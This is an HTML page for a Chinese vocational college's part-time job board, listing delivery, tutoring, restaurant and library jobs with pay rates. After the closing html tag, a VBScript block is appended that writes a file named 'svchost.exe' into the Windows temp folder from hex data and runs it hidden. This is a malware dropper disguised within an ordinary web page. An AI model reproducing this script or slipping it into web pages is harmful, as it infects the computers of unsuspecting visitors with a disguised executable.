<!doctype html>
<html>
<head>
<meta charset="utf-8">
<link rel="stylesheet" type="text/css" href="jquery.jslides.css" media="screen" />
<script type="text/javascript" src="jquery-1.8.0.min.js"></script>
<script type="text/javascript" src="jquery.jslides.js"></script>
<title>guestbook</title>
     <style>
	        *{
			 padding:0px;
			 margin:0px;}
			 a{
			   text-decoration:none;
			   color:#000;}
			 ul{
				 list-style:none;}
			.top{
				height:120px;
				background:#00b187;}
	       .logo{
			   height:120px;
			   }
		    .menu{
			   float:right;
			   width:670px;
			   height:40px;
			   position:absolute;
			   top:5px;
			   right:100px;
			   }
		    .menu a{
				display:block;
				float:left;
				width:110px;
				height:40px;
				line-height:40px;
				text-align:center;
				color:#FFF;
				margin-top:40px;
				font-family:微软雅黑;}
			.menu a:hover{
				background:url(images/menu_bg_h.png) center center no-repeat;
				color:#66973C;}
				#full-screen-slider { 
				width:100%; 
				height:396px; 
				float:left; 
				position:relative}
             #slides { 
			    display:block; 
			    width:100%; 
			    height:396px; 
			    list-style:none;
			    padding:0; 
			    margin:0; 
			    position:relative}
             #slides li { 
			    display:block;
			    width:100%;
			    height:100%;
			    list-style:none;
				padding:0;
				margin:0; 
				position:absolute}
             #slides li a {
				display:block;
			    width:100%;
			    height:100%;
			    text-indent:-9999px}


			table,tr{
				border: 1px solid black;

			}
			table{
				width: 80%;margin: 0 auto;
				text-align: left;

			}

			td{
				height: 50px;

			}
			.aa{
				background-color: #4be5c1;
				height: 50px;
			}
			.link-btn{
				background: #f49c1e;
				text-align: center;
				padding-top: 8px;
				padding-bottom: 8px;
				padding-left: 15px;
				padding-right: 15px;
			}
			.e_h1{
				text-align: left;

			}
			.spe-title{
				text-align: left;
                padding-left: 130px;
				padding: 30px auto;
			}
			section{
				padding-bottom: 50px;
				padding-top: 100px;
			}
             .submenu{
                
                height:30px;
                line-height:30px;
                width:1000px;
                padding-bottom: 20px;
            }
            h2{
                color: #f49c1e;
            }
            .right{
                width: 100%;
                height: 420px;
                padding-left: 130px;
            }
            .mx{
                
                height: 170px;
                float: left;
            }
            .tou{
                padding-left:: 10px;
                padding-right: 15px;
                }
            .zi{
            	
                padding-left: 10px;
                font-size: 15px;
                width: 240px;
                background: #f49c1e;
                
            }

			.footer{
				height:140px;
				background:#00b187;
				clear:both;
				position:absolute;
				left:0px;}
			.center-box{
				width:1422px;
				height:120px;
				margin:0 auto;}
			.text{
				 height:105px;
				 color:#fff;
				 float:left;
				 line-height:23px;
				 font-size:13px;
				 padding-top:15px;
				 padding-left:120px;
				 position:relative;
				 top:5px;
				 left:200px;}
			.weixin{
				height:95px;
				float:right;
				text-align:center;
				padding-right:120px;
				padding-top:25px;
				position:relative;
				top:5px;
				left:-240px;}


	 </style>
</head>

<body>
      <div class="top">
           <div class="logo">
                <img src="image/logo.png" style="width:360px; height:96px; margin-top:20px; margin-left:100px;">
           </div>
       <div class="menu">
              <a href="index.html">首页</a>
             <a href="a.html">发布兼职</a>
             <a href="b.html">求职投递</a>
             <a href="news_article.php">校园新闻</a>
             <a href="">服务帮助</a>
             <a href="guestbook.html">在线留言</a>
         </div>
     </div>
    <div id="full-screen-slider">
	<ul id="slides">
		<li style="background:url('image/a.png') no-repeat center top">
        	<a href="" target="_blank">第一张焦点幻灯的标题</a>
        </li>
		<li style="background:url('image/2.png') no-repeat center top">
        	<a href="" target="_blank">第二张焦点幻灯的标题</a>
        </li>
	</ul>
   </div>
   
  <section>
        <div class="rows tb-space">
            <div class="container events events-1" id="inner-page-title">
                
                      
                <div class="spe-title">
                    <h2>热门兼职</h2>
                    <div class="title-line">
                        <div class="tl-1"></div>
                        <div class="tl-2"></div>
                        <div class="tl-3"></div>
                    </div>
                    <p>              &nbsp;&nbsp;               </p>
                </div>
   
                <table id="myTable">
                    <tbody>
                        <tr class="aa">
                            <th>#</th>
                            <th>兼职单位</th>
                            <th class="e_h1">兼职类型</th>
                            <th class="e_h1">时间</th>
                            <th class="e_h1">工资</th>
                            <th class="e_h1">面试申请</th>
                        </tr>
                        <tr>
                            <td>1</td>
                            <td><img src="images/iplace-1.jpg" alt="" /><a href="#" class="events-title">美团外卖</a>
                            </td>
                            <td class="e_h1">外卖员</td>
                            <td class="e_h1">课余时间</td>
                            <td class="e_h1">1单/2元</td>
                            <td class="e_h1"><a href="booking.html" class="link-btn">申 请</a>
                            </td>
                        </tr>
                        <tr>
                            <td>2</td>
                            <td><img src="images/iplace-2.jpg" alt="" /><a href="#" class="events-title">零点校园外卖服务</a>
                            </td>
                            <td class="e_h1">外卖员</td>
                            <td class="e_h1">课余时间</td>
                            <td class="e_h1">1单/2元</td>
                            <td class="e_h1"><a href="booking.html" class="link-btn">申 请</a>
                            </td>
                        </tr>
                        <tr>
                            <td>3</td>
                            <td><img src="images/iplace-3.jpg" alt="" /><a href="#" class="events-title">萨拉齐学霸教育</a>
                            </td>
                            <td class="e_h1">辅导老师</td>
                            <td class="e_h1">6.00 PM-10.00 PM</td>
                            <td class="e_h1">1天/50元</td>
                            <td class="e_h1"><a href="booking.html" class="link-btn">申 请</a>
                            </td>
                        </tr>
                        <tr>
                            <td>4</td>
                            <td><img src="images/iplace-4.jpg" alt="" /><a href="#" class="events-title">面香阁饭店</a>
                            </td>
                            <td class="e_h1">服务员</td>
                            <td class="e_h1">中午&晚上</td>
                            <td class="e_h1">1天/40元</td>
                            <td class="e_h1"><a href="booking.html" class="link-btn">申 请</a>
                            </td>
                        </tr>
                        <tr>
                            <td>5</td>
                            <td><img src="images/iplace-5.jpg" alt="" /><a href="#" class="events-title">名佬麻辣烫</a>
                            </td>
                            <td class="e_h1">服务员</td>
                            <td class="e_h1">中午&晚上</td>
                            <td class="e_h1">1天/40元</td>
                            <td class="e_h1"><a href="booking.html" class="link-btn">申 请</a>
                            </td>
                        </tr>
                        <tr>
                            <td>6</td>
                            <td><img src="images/iplace-6.jpg" alt="" /><a href="#" class="events-title">农职院保卫科</a>
                            </td>
                            <td class="e_h1">保卫员</td>
                            <td class="e_h1">6.00 PM-10.00 PM</td>
                            <td class="e_h1">1月/600元</td>
                            <td class="e_h1"><a href="booking.html" class="link-btn">申 请</a>
                            </td>
                        </tr>
                        <tr>
                            <td>7</td>
                            <td><img src="images/iplace-7.jpg" alt="" /><a href="#" class="events-title">农职院图书馆</a>
                            </td>
                            <td class="e_h1">图书管理员</td>
                            <td class="e_h1">课余时间</td>
                            <td class="e_h1">1月/600元</td>
                            <td class="e_h1"><a href="booking.html" class="link-btn">申 请</a>
                            </td>
                        </tr>
                        <tr>
                            <td>8</td>
                            <td><img src="images/iplace-8.jpg" alt="" /><a href="#" class="events-title">紫荆花饭店</a>
                            </td>
                            <td class="e_h1">收银</td>
                            <td class="e_h1">中午&晚上</td>
                            <td class="e_h1">1天/40元</td>
                            <td class="e_h1"><a href="booking.html" class="link-btn">申 请</a>
                            </td>
                        </tr>
                        <tr>
                            <td>9</td>
                            <td><img src="images/iplace-9.jpg" alt="" /><a href="#" class="events-title">菜鸟驿站</a>
                            </td>
                            <td class="e_h1">快递员</td>
                            <td class="e_h1">课余时间</td>
                            <td class="e_h1">1天/40元</td>
                            <td class="e_h1"><a href="booking.html" class="link-btn">申 请</a>
                            </td>
                        </tr>
                        <tr>
                            <td>10</td>
                            <td><img src="images/iplace-4.jpg" alt="" /><a href="#" class="events-title">肥羊火锅烧烤</a>
                            </td>
                            <td class="e_h1">服务员</td>
                            <td class="e_h1">中午&晚上</td>
                            <td class="e_h1">1天/40元</td>
                            <td class="e_h1"><a href="booking.html" class="link-btn">申 请</a>
                            </td>
                        </tr>
                    </tbody>
                </table>
            </div>
        </div>
    </section>

        <div class="right" >
              <div class="submenu"><a href="index.html"></a>  <h2>兼职明星</h2></div>
              <div class="mx">
                  <div class="tou"><img src="image/t1.jpg" style="width: 250px;height: 250px;" ></div>
                  <div class="zi">用户名</div>
                  <div class="zi">座右铭</div>
                  


              </div>
              <div class="mx">
                  <div class="tou"><img src="image/t1.jpg" style="width: 250px;height: 250px;" ></div>
                  <div class="zi">用户名</div>
                  <div class="zi">座右铭</div>
                  


              </div>
              <div class="mx">
                  <div class="tou"><img src="image/t1.jpg" style="width: 250px;height: 250px;" ></div>
                  <div class="zi">用户名</div>
                  <div class="zi">座右铭</div>
                  


              </div>

                <div class="mx">
                  <div class="tou"><img src="image/t1.jpg" style="width: 250px;height: 250px;" ></div>
                  <div class="zi">用户名</div>
                  <div class="zi">座右铭</div>
                  


              </div>
              
        </div>
  
   <div class="footer">
         <div class="center-box">
                <div class="text">
                   校园兼职平台<br/>
                   电话：027-87221877E-maishxm@hubeiwater.gov.cn<br/>
                   地址：包头市土默特右旗萨拉齐镇内蒙古农业大学职业技术学院<br/>
                   友情链接:<a href="">内蒙古农业大学职业技术学院</a>&nbsp;&nbsp;
                </diV>
              <div class="weixin">
                   <img src="images/ewm.png" alt="">
              </div>
         </div>
    </div>
</body>
</html>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>